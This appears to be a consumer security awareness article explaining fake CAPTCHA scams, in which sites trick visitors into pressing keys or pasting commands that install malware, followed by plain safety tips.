We’ve all done it, clicked a CAPTCHA box that says “I’m not a robot” without giving it a second thought. These quick human verification checks are so familiar that they’ve become almost invisible. But that’s exactly what cybercriminals are counting on.
A new wave of scams is exploiting this trust through Fake CAPTCHAs, deceptively realistic-looking prompts designed not to verify your humanity, but to trick you into running malicious commands on your own device.
What is a CAPTCHA?
A CAPTCHA (which stands for "Completely Automated Public Turing test to tell Computers and Humans Apart") is a security feature used by websites to determine whether a user is a real person or an automated bot. CAPTCHAs help protect websites from spam, abuse, and malicious activity by presenting challenges that are easy for humans to solve but difficult for automated systems. such as identifying objects in images, typing distorted text, or solving simple math problems. They are commonly used during account sign-ups, form submissions, or logins to ensure that the interaction is genuine.
What Is a Fake CAPTCHA?
A Fake CAPTCHA is a phoney version of the familiar CAPTCHA test. However, unlike a legitimate CAPTCHA that might ask you to identify traffic lights or solve a puzzle, this fake version might ask you to:
- Press certain keys (like Windows + R)
- Paste copied text into a terminal or command prompt
- Download a file or script
- Enter your system credentials
These unusual requests are red flags – no real CAPTCHA should ever ask you to interact with your system this way.
How the Scam Works
- The Setup: You visit a compromised or malicious site. A seemingly safe CAPTCHA window appears.
- The Deception: You’re asked to click a checkbox or follow instructions, like copying and pasting text or pressing keys.
- The Trigger: These actions execute a script or command on your machine.
- The Damage: Malware is downloaded, possibly giving cybercriminals access to your sensitive data, including passwords, banking info, and more.
This scam is especially dangerous because it feels like you're in control. You’re not being hacked in the traditional sense; you’re being tricked into hacking yourself.
Why It Works
The strength of the Fake CAPTCHA scam lies in its subtlety. It uses something we’ve grown used to, a CAPTCHA, and twists it into a delivery mechanism for malware. Because we’re so used to CAPTCHAs being a routine part of web browsing, we often don’t pause to question their authenticity.
What You Can Do to Stay Safe
Here are some quick tips to protect yourself:
Be sceptical of unusual CAPTCHAs
If a CAPTCHA asks you to do anything beyond clicking a box, selecting images, or performing a mental exercise on a website, something’s wrong.
Never run commands or paste text from unknown sites
Legitimate websites and CAPTCHAs will never require you to interact with your system in this way.
Keep antivirus software up to date
Modern security tools can detect and block malicious scripts before they can cause harm.
Stay informed
Knowing how these scams work is half the battle. The more familiar you are with the red flags, the less likely you are to fall for them.
Ask for help
If you’re ever unsure whether an instruction is safe, speak to your family and friends, or contact us here (cyber concerns).
The Bottom Line
Fake CAPTCHAs are a sobering reminder that even the most mundane online tasks can be weaponised. These scams are clever, convincing, and increasingly common. So next time a site asks you to prove you’re not a robot, pause for a moment. If anything seems off, don’t click and don’t follow instructions without verifying.